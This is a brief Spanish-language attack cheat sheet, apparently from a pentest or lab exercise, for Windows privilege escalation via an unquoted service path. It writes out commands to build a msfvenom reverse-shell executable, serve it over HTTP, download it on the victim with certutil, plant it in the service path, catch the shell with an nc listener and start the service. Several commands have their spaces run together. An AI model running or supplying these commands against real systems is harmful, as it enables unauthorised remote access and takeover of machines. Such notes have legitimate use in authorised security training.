# Generación y transferencia de reverse shell## Máquina atacantemsfvenom-pwindows/x64/shell_reverse_tcpLHOST=<attacker-IP-address>LPORT=443-fexe-oreverse.exemd5sumreverse.exe; python3-mhttp.server80## Máquina victimacertutil.exe -urlcache -f http://<attacker-IP-address>:80/reverse.exe reverse.exe & certutil.exe -hashfile reverse.exe MD5
# Copia de reverse shell a ruta del servicio## Ruta original del servicio: C:\Program Files\Unquoted Path Service\Common Files\service.execopyreverse.exe"C:\Program Files\Unquoted Path Service\Common.exe"# Configuración de listener de reverse shell en máquina atacanterlwrapnc-lvnp443# Inicio del servicionetstart<service-name>